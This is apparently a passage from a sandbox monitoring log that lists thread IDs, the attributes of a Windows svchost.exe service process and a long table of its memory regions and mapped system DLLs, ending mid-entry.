Thread: id = 107 os_tid = 0x8bc Thread: id = 108 os_tid = 0x8b8 Thread: id = 109 os_tid = 0x874 Thread: id = 110 os_tid = 0x850 Thread: id = 111 os_tid = 0x83c Thread: id = 112 os_tid = 0x834 Thread: id = 113 os_tid = 0x824 Thread: id = 114 os_tid = 0x558 Thread: id = 115 os_tid = 0x628 Thread: id = 116 os_tid = 0x568 Thread: id = 117 os_tid = 0x4cc Thread: id = 118 os_tid = 0x474 Thread: id = 119 os_tid = 0x42c Thread: id = 120 os_tid = 0x164 Thread: id = 121 os_tid = 0x7f8 Thread: id = 122 os_tid = 0x7e4 Thread: id = 123 os_tid = 0x7bc Thread: id = 124 os_tid = 0x424 Thread: id = 125 os_tid = 0x730 Thread: id = 126 os_tid = 0x6e8 Thread: id = 127 os_tid = 0x694 Thread: id = 128 os_tid = 0x690 Thread: id = 129 os_tid = 0x668 Thread: id = 130 os_tid = 0x648 Thread: id = 131 os_tid = 0x604 Thread: id = 132 os_tid = 0x5e4 Thread: id = 133 os_tid = 0x4e0 Thread: id = 134 os_tid = 0x468 Thread: id = 135 os_tid = 0x450 Thread: id = 136 os_tid = 0x438 Thread: id = 137 os_tid = 0x434 Thread: id = 138 os_tid = 0x430 Thread: id = 139 os_tid = 0x3d8 Thread: id = 140 os_tid = 0x280 Thread: id = 141 os_tid = 0x170 Thread: id = 142 os_tid = 0x210 Thread: id = 143 os_tid = 0x16c Thread: id = 144 os_tid = 0x178 Thread: id = 145 os_tid = 0x190 Thread: id = 146 os_tid = 0x140 Thread: id = 147 os_tid = 0x120 Thread: id = 148 os_tid = 0x60 Thread: id = 149 os_tid = 0x3ec Thread: id = 177 os_tid = 0x111c Thread: id = 178 os_tid = 0x424 Thread: id = 179 os_tid = 0x570 Thread: id = 181 os_tid = 0x944 Thread: id = 182 os_tid = 0x1108 Thread: id = 183 os_tid = 0xc48 Thread: id = 185 os_tid = 0x5f8 Thread: id = 186 os_tid = 0x8d4 Thread: id = 187 os_tid = 0x9a0 Thread: id = 188 os_tid = 0xf00 Thread: id = 189 os_tid = 0x9e8 Process: id = "19" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x75321000" os_pid = "0x378" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "18" os_parent_pid = "0x214" cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalServiceNetworkRestricted" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\AppIDSvc" [0xa], "NT SERVICE\\Audiosrv" [0xa], "NT SERVICE\\Dhcp" [0xa], "NT SERVICE\\eventlog" [0xa], "NT SERVICE\\HomeGroupProvider" [0xa], "NT SERVICE\\icssvc" [0xa], "NT SERVICE\\lmhosts" [0xe], "NT SERVICE\\NgcCtnrSvc" [0xa], "NT SERVICE\\vmictimesync" [0xa], "NT SERVICE\\Wcmsvc" [0xa], "NT SERVICE\\wscsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000c224" [0xc000000f], "LOCAL" [0x7] Region: id = 1781 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1782 start_va = 0x20000 end_va = 0x21fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1783 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1784 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1785 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 1786 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 1787 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 1788 start_va = 0x100000 end_va = 0x1bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1789 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 1790 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 1791 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1792 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 1793 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1794 start_va = 0x400000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1795 start_va = 0x480000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 1796 start_va = 0x540000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 1797 start_va = 0x560000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 1798 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 1799 start_va = 0x5a0000 end_va = 0x5a6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 1800 start_va = 0x5b0000 end_va = 0x5b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 1801 start_va = 0x5c0000 end_va = 0x5c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 1802 start_va = 0x5d0000 end_va = 0x5d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 1803 start_va = 0x5e0000 end_va = 0x5e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005e0000" filename = "" Region: id = 1804 start_va = 0x5f0000 end_va = 0x5f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 1805 start_va = 0x600000 end_va = 0x6fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 1806 start_va = 0x700000 end_va = 0x77ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000700000" filename = "" Region: id = 1807 start_va = 0x780000 end_va = 0x7fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000780000" filename = "" Region: id = 1808 start_va = 0x800000 end_va = 0x800fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000800000" filename = "" Region: id = 1809 start_va = 0x860000 end_va = 0x866fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1810 start_va = 0x870000 end_va = 0x8d3fff monitored = 0 entry_point = 0x885ae0 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 1811 start_va = 0x900000 end_va = 0x9fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000900000" filename = "" Region: id = 1812 start_va = 0xa00000 end_va = 0xb87fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a00000" filename = "" Region: id = 1813 start_va = 0xb90000 end_va = 0xd10fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b90000" filename = "" Region: id = 1814 start_va = 0xd20000 end_va = 0x111afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d20000" filename = "" Region: id = 1815 start_va = 0x1120000 end_va = 0x119ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001120000" filename = "" Region: id = 1816 start_va = 0x12b0000 end_va = 0x12b6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000012b0000" filename = "" Region: id = 1817 start_va = 0x1300000 end_va = 0x13fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001300000" filename = "" Region: id = 1818 start_va = 0x1400000 end_va = 0x147ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001400000" filename = "" Region: id = 1819 start_va = 0x1480000 end_va = 0x14fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001480000" filename = "" Region: id = 1820 start_va = 0x1500000 end_va = 0x15fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001500000" filename = "" Region: id = 1821 start_va = 0x16d0000 end_va = 0x16d6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000016d0000" filename = "" Region: id = 1822 start_va = 0x1700000 end_va = 0x17fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001700000" filename = "" Region: id = 1823 start_va = 0x1800000 end_va = 0x187ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001800000" filename = "" Region: id = 1824 start_va = 0x1880000 end_va = 0x18fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001880000" filename = "" Region: id = 1825 start_va = 0x1900000 end_va = 0x197ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001900000" filename = "" Region: id = 1826 start_va = 0x1980000 end_va = 0x19fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001980000" filename = "" Region: id = 1827 start_va = 0x1a00000 end_va = 0x1afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001a00000" filename = "" Region: id = 1828 start_va = 0x1b90000 end_va = 0x1c8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001b90000" filename = "" Region: id = 1829 start_va = 0x1d00000 end_va = 0x1dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d00000" filename = "" Region: id = 1830 start_va = 0x1e00000 end_va = 0x1efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e00000" filename = "" Region: id = 1831 start_va = 0x1f00000 end_va = 0x1ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f00000" filename = "" Region: id = 1832 start_va = 0x2000000 end_va = 0x20fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002000000" filename = "" Region: id = 1833 start_va = 0x2100000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 1834 start_va = 0x2200000 end_va = 0x22fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002200000" filename = "" Region: id = 1835 start_va = 0x2300000 end_va = 0x2636fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1836 start_va = 0x2640000 end_va = 0x273ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002640000" filename = "" Region: id = 1837 start_va = 0x2740000 end_va = 0x281ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 1838 start_va = 0x2820000 end_va = 0x291ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002820000" filename = "" Region: id = 1839 start_va = 0x2920000 end_va = 0x2a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002920000" filename = "" Region: id = 1840 start_va = 0x2a20000 end_va = 0x2b1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a20000" filename = "" Region: id = 1841 start_va = 0x2c00000 end_va = 0x2cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002c00000" filename = "" Region: id = 1842 start_va = 0x2d00000 end_va = 0x2dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d00000" filename = "" Region: id = 1843 start_va = 0x2e00000 end_va = 0x2efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e00000" filename = "" Region: id = 1844 start_va = 0x2f00000 end_va = 0x2ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002f00000" filename = "" Region: id = 1845 start_va = 0x3000000 end_va = 0x30fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003000000" filename = "" Region: id = 1846 start_va = 0x3200000 end_va = 0x32fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003200000" filename = "" Region: id = 1847 start_va = 0x3300000 end_va = 0x33fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003300000" filename = "" Region: id = 1848 start_va = 0x3400000 end_va = 0x34fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003400000" filename = "" Region: id = 1849 start_va = 0x3500000 end_va = 0x35fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003500000" filename = "" Region: id = 1850 start_va = 0x3600000 end_va = 0x36fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003600000" filename = "" Region: id = 1851 start_va = 0x3700000 end_va = 0x37fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003700000" filename = "" Region: id = 1852 start_va = 0x3800000 end_va = 0x38fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003800000" filename = "" Region: id = 1853 start_va = 0x3a00000 end_va = 0x3afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003a00000" filename = "" Region: id = 1854 start_va = 0x3b00000 end_va = 0x3bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003b00000" filename = "" Region: id = 1855 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1856 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 1857 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 1858 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 1859 start_va = 0x7ff6a3140000 end_va = 0x7ff6a314cfff monitored = 0 entry_point = 0x7ff6a3143980 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 1860 start_va = 0x7ff860b40000 end_va = 0x7ff860b72fff monitored = 0 entry_point = 0x7ff860b4ae20 region_type = mapped_file name = "wscsvc.dll" filename = "\\Windows\\System32\\wscsvc.dll" (normalized: "c:\\windows\\system32\\wscsvc.dll") Region: id = 1861 start_va = 0x7ff866b90000 end_va = 0x7ff866d47fff monitored = 0 entry_point = 0x7ff866b95550 region_type = mapped_file name = "wmalfxgfxdsp.dll" filename = "\\Windows\\System32\\WMALFXGFXDSP.dll" (normalized: "c:\\windows\\system32\\wmalfxgfxdsp.dll") Region: id = 1862 start_va = 0x7ff867de0000 end_va = 0x7ff867e67fff monitored = 0 entry_point = 0x7ff867df4510 region_type = mapped_file name = "audioses.dll" filename = "\\Windows\\System32\\AudioSes.dll" (normalized: "c:\\windows\\system32\\audioses.dll") Region: id = 1863 start_va = 0x7ff86e970000 end_va = 0x7ff86e983fff monitored = 0 entry_point = 0x7ff86e971800 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 1864 start_va = 0x7ff86e990000 end_va = 0x7ff86ea85fff monitored = 0 entry_point = 0x7ff86e9c9590 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 1865 start_va = 0x7ff86efa0000 end_va = 0x7ff86efb0fff monitored = 0 entry_point = 0x7ff86efa2fc0 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 1866 start_va = 0x7ff870c70000 end_va = 0x7ff870ceefff monitored = 0 entry_point = 0x7ff870c87110 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 1867 start_va = 0x7ff874560000 end_va = 0x7ff87458afff monitored = 0 entry_point = 0x7ff87456c3c0 region_type = mapped_file name = "rtworkq.dll" filename = "\\Windows\\System32\\RTWorkQ.dll" (normalized: "c:\\windows\\system32\\rtworkq.dll") Region: id = 1868 start_va = 0x7ff874590000 end_va = 0x7ff87469cfff monitored = 0 entry_point = 0x7ff8745bf420 region_type = mapped_file name = "mfplat.dll" filename = "\\Windows\\System32\\mfplat.dll" (normalized: "c:\\windows\\system32\\mfplat.dll") Region: id = 1869 start_va = 0x7ff8750d0000 end_va = 0x7ff8750dafff monitored = 0 entry_point = 0x7ff8750d1d30 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 1870 start_va = 0x7ff8750e0000 end_va = 0x7ff875127fff monitored = 0 entry_point = 0x7ff8750ea1e0 region_type = mapped_file name = "dhcpcore6.dll" filename = "\\Windows\\System32\\dhcpcore6.dll" (normalized: "c:\\windows\\system32\\dhcpcore6.dll") Region: id = 1871 start_va = 0x7ff875250000 end_va = 0x7ff875269fff monitored = 0 entry_point = 0x7ff875252430 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 1872 start_va = 0x7ff875270000 end_va = 0x7ff875285fff monitored = 0 entry_point = 0x7ff8752719f0 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 1873 start_va = 0x7ff8752d0000 end_va = 0x7ff8752ddfff monitored = 0 entry_point = 0x7ff8752d2e50 region_type = mapped_file name = "cmintegrator.dll" filename = "\\Windows\\System32\\cmintegrator.dll" (normalized: "c:\\windows\\system32\\cmintegrator.dll") Region: id = 1874 start_va = 0x7ff8752e0000 end_va = 0x7ff875317fff monitored = 0 entry_point = 0x7ff8752e68f0 region_type = mapped_file name = "wcmcsp.dll" filename = "\\Windows\\System32\\wcmcsp.dll" (normalized: "c:\\windows\\system32\\wcmcsp.dll") Region: id = 1875 start_va = 0x7ff875480000 end_va = 0x7ff8754b7fff monitored = 0 entry_point = 0x7ff875498cc0 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 1876 start_va = 0x7ff8754c0000 end_va = 0x7ff875558fff monitored = 0 entry_point = 0x7ff8754da090 region_type = mapped_file name = "wcmsvc.dll" filename = "\\Windows\\System32\\wcmsvc.dll" (normalized: "c:\\windows\\system32\\wcmsvc.dll") Region: id = 1877 start_va = 0x7ff875ae0000 end_va = 0x7ff875b3cfff monitored = 0 entry_point = 0x7ff875af2bf0 region_type = mapped_file name = "dhcpcore.dll" filename = "\\Windows\\System32\\dhcpcore.dll" (normalized: "c:\\windows\\system32\\dhcpcore.dll") Region: id = 1878 start_va = 0x7ff875b50000 end_va = 0x7ff875c5afff monitored = 0 entry_point = 0x7ff875b92610 region_type = mapped_file name = "audiosrv.dll" filename = "\\Windows\\System32\\audiosrv.dll" (normalized: "c:\\windows\\system32\\audiosrv.dll") Region: id = 1879 start_va = 0x7ff875d20000 end_va = 0x7ff875d30fff monitored = 0 entry_point = 0x7ff875d23320 region_type = mapped_file name = "wmiclnt.dll" filename = "\\Windows\\System32\\wmiclnt.dll" (normalized: "c:\\windows\\system32\\wmiclnt.dll") Region: id = 1880 start_va = 0x7ff876870000 end_va = 0x7ff8769a5fff monitored = 0 entry_point = 0x7ff87689f350 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll") Region: id = 1881 start_va = 0x7ff878090000 end_va = 0x7ff8780fffff monitored = 0 entry_point = 0x7ff8780b2960 region_type = mapped_file name = "mmdevapi.dll" filename = "\\Windows\\System32\\MMDevAPI.dll" (normalized: "c:\\windows\\system32\\mmdevapi.dll") Region: id = 1882 start_va = 0x7ff8786b0000 end_va = 0x7ff8786c7fff monitored = 0 entry_point = 0x7ff8786b5910 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 1883 start_va = 0x7ff878960000 end_va = 0x7ff878b10fff monitored = 0 entry_point = 0x7ff8789b3690 region_type = mapped_file name = "wevtsvc.dll" filename = "\\Windows\\System32\\wevtsvc.dll" (normalized: "c:\\windows\\system32\\wevtsvc.dll") Region: id = 1884 start_va = 0x7ff878b20000 end_va = 0x7ff878be7fff monitored = 0 entry_point = 0x7ff878b613f0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 1885 start_va = 0x7ff878df0000 end_va = 0x7ff878e39fff monitored = 0 entry_point = 0x7ff878dfac30 region_type = mapped_file name = "deviceaccess.dll" filename = "\\Windows\\System32\\deviceaccess.dll" (normalized: "c:\\windows\\system32\\deviceaccess.dll") Region: id = 1886 start_va = 0x7ff8798b0000 end_va = 0x7ff8798b8fff monitored = 0 entry_point = 0x7ff8798b19a0 region_type = mapped_file name = "nrpsrv.dll" filename = "\\Windows\\System32\\nrpsrv.dll" (normalized: "c:\\windows\\system32\\nrpsrv.dll") Region: id = 1887 start_va = 0x7ff8798c0000 end_va = 0x7ff8798cafff monitored = 0 entry_point = 0x7ff8798c1cd0 region_type = mapped_file name = "lmhsvc.dll" filename = "\\Windows\\System32\\lmhsvc.dll" (normalized: "c:\\windows\\system32\\lmhsvc.dll") Region: id = 1888 start_va = 0x7ff87ab10000 end_va = 0x7ff87ac95fff monitored = 0 entry_point = 0x7ff87ab5d700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 1889 start_va = 0x7ff87ad00000 end_va = 0x7ff87ad12fff monitored = 0 entry_point = 0x7ff87ad02760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 1890 start_va = 0x7ff87afe0000 end_va = 0x7ff87b006fff monitored = 0 entry_point = 0x7ff87afe7940 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 1891 start_va = 0x7ff87b030000 end_va = 0x7ff87b0d9fff monitored = 0 entry_point = 0x7ff87b057910 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 1892 start_va = 0x7ff87b340000 end_va = 0x7ff87b371fff monitored = 0 entry_point = 0x7ff87b352340 region_type = mapped_file name = "fwbase.dll" filename = "\\Windows\\System32\\fwbase.dll" (normalized: "c:\\windows\\system32\\fwbase.dll") Region: id = 1893 start_va = 0x7ff87b5c0000 end_va = 0x7ff87b5e3fff monitored = 0 entry_point = 0x7ff87b5c3260 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 1894 start_va = 0x7ff87b760000 end_va = 0x7ff87b853fff monitored = 0 entry_point = 0x7ff87b76a960 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 1895 start_va = 0x7ff87b9d0000 end_va = 0x7ff87b9dbfff monitored = 0 entry_point = 0x7ff87b9d27e0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 1896 start_va = 0x7ff87bab0000 end_va = 0x7ff87bae0fff monitored = 0 entry_point = 0x7ff87bab7d10 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 1897 start_va = 0x7ff87bd20000 end_va = 0x7ff87bd3efff monitored = 0 entry_point = 0x7ff87bd25d30 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 1898 start_va = 0x7ff87be90000 end_va = 0x7ff87beebfff monitored = 0 entry_point = 0x7ff87bea6f70 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 1899 start_va = 0x7ff87c060000 end_va = 0x7ff87c06afff monitored = 0 entry_point = 0x7ff87c0619a0 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1900 start_va = 0x7ff87c240000 end_va = 0x7ff87c26cfff monitored = 0 entry_point = 0x7ff87c259d40 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 1901 start_va = 0x7ff87c3d0000 end_va = 0x7ff87c425fff monitored = 0 entry_point = 0x7ff87c3e0bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 1902 start_va = 0x7ff87c450000 end_va = 0x7ff87c478fff monitored = 0 entry_point = 0x7ff87c464530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 1903 start_va = 0x7ff87c5c0000 end_va = 0x7ff87c5cffff monitored = 0 entry_point = 0x7ff87c5c56e0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 1904 start_va = 0x7ff87c5d0000 end_va = 0x7ff87c5e3fff monitored = 0 entry_point = 0x7ff87c5d52e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 1905 start_va = 0x7ff87c5f0000 end_va = 0x7ff87c63afff monitored = 0 entry_point = 0x7ff87c5f35f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 1906 start_va = 0x7ff87c640000 end_va = 0x7ff87c64efff monitored = 0 entry_point = 0x7ff87c643210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 1907 start_va = 0x7ff87c710000 end_va = 0x7ff87c752fff monitored = 0 entry_point = 0x7ff87c724b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 1908 start_va = 0x7ff87cdb0000 end_va = 0x7ff87ce35fff monitored = 0 entry_point = 0x7ff87cdbd8f0 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 1909 start_va = 0x7ff87ce40000 end_va = 0x7ff87d027fff monitored = 0 entry_point = 0x7ff87ce6ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1910 start_va = 0x7ff87d030000 end_va = 0x7ff87d099fff monitored = 0 entry_point = 0x7ff87d066d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 1911 start_va = 0x7ff87d170000 end_va = 0x7ff87d336fff monitored = 0 entry_point = 0x7ff87d1cdb80 region_type = 